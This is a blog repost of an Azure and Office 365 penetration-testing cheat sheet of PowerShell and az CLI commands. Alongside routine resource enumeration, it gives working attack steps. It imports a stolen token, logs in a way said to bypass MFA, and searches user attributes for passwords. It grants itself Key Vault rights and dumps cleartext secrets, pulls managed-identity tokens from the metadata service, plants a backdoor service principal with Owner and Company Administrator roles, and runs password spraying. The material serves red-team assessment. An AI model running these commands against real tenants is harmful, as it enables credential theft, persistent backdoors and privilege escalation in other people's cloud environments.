Azure Penetration Testing Cheat sheet

cheahengsoon

Eng Soon Cheah

Posted on February 5, 2021

Azure Penetration Testing Cheat sheet

Microsoft Azure & O365 CLI Tool Cheatsheet

By Beau Bullock (@dafthack)

Az PowerShell Module

Import-Module Az
Enter fullscreen mode Exit fullscreen mode

Authentication

Connect-AzAccount

## Or this way sometimes gets around MFA restrictions

$credential = Get-Credential
Connect-AzAccount -Credential $credential
Enter fullscreen mode Exit fullscreen mode

Import a context file

Import-AzContext -Profile 'C:\Temp\Live Tokens\StolenToken.json'
Enter fullscreen mode Exit fullscreen mode

Export a context file

Save-AzContext -Path C:\Temp\AzureAccessToken.json
Enter fullscreen mode Exit fullscreen mode

Account Information

List the current Azure contexts available

Get-AzContext -ListAvailable
Enter fullscreen mode Exit fullscreen mode

Get context details

$context = Get-AzContext
$context.Name
$context.Account
Enter fullscreen mode Exit fullscreen mode

List subscriptions

Get-AzSubscription
Enter fullscreen mode Exit fullscreen mode

Choose a subscription

Select-AzSubscription -SubscriptionID "SubscriptionID"
Enter fullscreen mode Exit fullscreen mode

Get the current user's role assignment

Get-AzRoleAssignment
Enter fullscreen mode Exit fullscreen mode

List all resources and resource groups

Get-AzResource
Get-AzResourceGroup
Enter fullscreen mode Exit fullscreen mode

List storage accounts

Get-AzStorageAccount
Enter fullscreen mode Exit fullscreen mode

WebApps & SQL

List Azure web applications

Get-AzAdApplication
Get-AzWebApp
Enter fullscreen mode Exit fullscreen mode

List SQL servers

Get-AzSQLServer
Enter fullscreen mode Exit fullscreen mode

Individual databases can be listed with information retrieved from the previous command

Get-AzSqlDatabase -ServerName $ServerName -ResourceGroupName $ResourceGroupName
Enter fullscreen mode Exit fullscreen mode

List SQL Firewall rules

Get-AzSqlServerFirewallRule ServerName $ServerName -ResourceGroupName $ResourceGroupName
Enter fullscreen mode Exit fullscreen mode

List SQL Server AD Admins

Get-AzSqlServerActiveDirectoryAdminstrator -ServerName $ServerName -ResourceGroupName $ResourceGroupName
Enter fullscreen mode Exit fullscreen mode

Runbooks

List Azure Runbooks

Get-AzAutomationAccount
Get-AzAutomationRunbook -AutomationAccountName <AutomationAccountName> -ResourceGroupName <ResourceGroupName>
Enter fullscreen mode Exit fullscreen mode

Export a runbook with:

Export-AzAutomationRunbook -AutomationAccountName $AccountName -ResourceGroupName $ResourceGroupName -Name $RunbookName -OutputFolder .\Desktop\
Enter fullscreen mode Exit fullscreen mode

Virtual Machines

List VMs and get OS details

Get-AzVM
$vm = Get-AzVM -Name "VM Name" 
$vm.OSProfile
Enter fullscreen mode Exit fullscreen mode

Run commands on VMs

Invoke-AzVMRunCommand -ResourceGroupName $ResourceGroupName -VMName $VMName -CommandId RunPowerShellScript -ScriptPath ./powershell-script.ps1
Enter fullscreen mode Exit fullscreen mode

Networking

List virtual networks

Get-AzVirtualNetwork
Enter fullscreen mode Exit fullscreen mode

List public IP addresses assigned to virtual NICs

Get-AzPublicIpAddress
Enter fullscreen mode Exit fullscreen mode

Get Azure ExpressRoute (VPN) Info

Get-AzExpressRouteCircuit
Enter fullscreen mode Exit fullscreen mode

Backdoors

Create a new Azure service principal as a backdoor

$spn = New-AzAdServicePrincipal -DisplayName "WebService" -Role Owner
$spn
$BSTR = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($spn.Secret)
$UnsecureSecret = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($BSTR)
$UnsecureSecret
$sp = Get-MsolServicePrincipal -AppPrincipalId <AppID>
$role = Get-MsolRole -RoleName "Company Administrator"
Add-MsolRoleMember -RoleObjectId $role.ObjectId -RoleMemberType ServicePrincipal -RoleMemberObjectId $sp.ObjectId
#Enter the AppID as username and what was returned for $UnsecureSecret as the password in the Get-Credential prompt
$cred = Get-Credential
Connect-AzAccount -Credential $cred -Tenant tenant ID" -ServicePrincipal
Enter fullscreen mode Exit fullscreen mode

MSOnline PowerShell Module

Import-Module MSOnline
Enter fullscreen mode Exit fullscreen mode

Authentication

Connect-MsolService

## Or this way sometimes gets around MFA restrictions

$credential = Get-Credential
Connect-MsolService -Credential $credential
Enter fullscreen mode Exit fullscreen mode

Account and Directory Information

List Company Information

Get-MSolCompanyInformation
Enter fullscreen mode Exit fullscreen mode

List all users

Get-MSolUser -All
Enter fullscreen mode Exit fullscreen mode

List all groups

Get-MSolGroup -All
Enter fullscreen mode Exit fullscreen mode

List members of a group (Global Admins in this case)

Get-MsolRole -RoleName "Company Administrator"
Get-MSolGroupMember GroupObjectId $GUID
Enter fullscreen mode Exit fullscreen mode

List all user attributes

Get-MSolUser All | fl
Enter fullscreen mode Exit fullscreen mode

List Service Principals

Get-MsolServicePrincipal
Enter fullscreen mode Exit fullscreen mode

One-liner to search all Azure AD user attributes for passwords

$users = Get-MsolUser; foreach($user in $users){$props = @();$user | Get-Member | foreach-object{$props+=$_.Name}; foreach($prop in $props){if($user.$prop -like "*password*"){Write-Output ("[*]" + $user.UserPrincipalName + "[" + $prop + "]" + " : " + $user.$prop)}}} 
Enter fullscreen mode Exit fullscreen mode

Az CLI Tool

Authentication

az login
Enter fullscreen mode Exit fullscreen mode

Dump Azure Key Vaults

List out any key vault resources the current account can view

az keyvault list –query '[].name' --output tsv 
Enter fullscreen mode Exit fullscreen mode

With contributor level access you can give yourself the right permissions to obtain secrets.

az keyvault set-policy --name <KeyVaultname> --upn <YourContributorUsername> --secret-permissions get list --key-permissions get list --storage-permissions get list --certificate-permissions get list 
Enter fullscreen mode Exit fullscreen mode

Get URI for Key Vault

az keyvault secret list --vault-name <KeyVaultName> --query '[].id' --output tsv 
Enter fullscreen mode Exit fullscreen mode

Get cleartext secret from keyvault

az keyvault secret show --id <URI from last command> | ConvertFrom-Json
Enter fullscreen mode Exit fullscreen mode

Metadata Service URL

http://169.254.169.254/metadata
Enter fullscreen mode Exit fullscreen mode

Get access tokens from the metadata service

GET 'http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/' HTTP/1.1 Metadata: true
Enter fullscreen mode Exit fullscreen mode

Other Azure & O365 Tools

MicroBurst

Azure security assessment tool

https://github.com/NetSPI/MicroBurst

Look for open storage blobs

Invoke-EnumerateAzureBlobs -Base $BaseName 
Enter fullscreen mode Exit fullscreen mode

Export SSL/TLS certs

Get-AzPasswords -ExportCerts Y
Enter fullscreen mode Exit fullscreen mode

Azure Container Registry dump

Get-AzPasswords
Get-AzACR
Enter fullscreen mode Exit fullscreen mode

PowerZure

Azure security assessment tool

https://github.com/hausec/PowerZure

ROADTools

Framework to interact with Azure AD

https://github.com/dirkjanm/ROADtools

Stormspotter

Red team tool for graphing Azure and Azure AD objects

https://github.com/Azure/Stormspotter

MSOLSpray

Tool to password spray Azure/O365

https://github.com/dafthack

Import-Module .\MSOLSpray.ps1
Invoke-MSOLSpray -UserList .\userlist.txt -Password Spring2020
Enter fullscreen mode Exit fullscreen mode
💖 💪 🙅 🚩
cheahengsoon
Eng Soon Cheah

Posted on February 5, 2021

Join Our Newsletter. No Spam, Only the good stuff.

Sign up to receive the latest update from our blog.

Related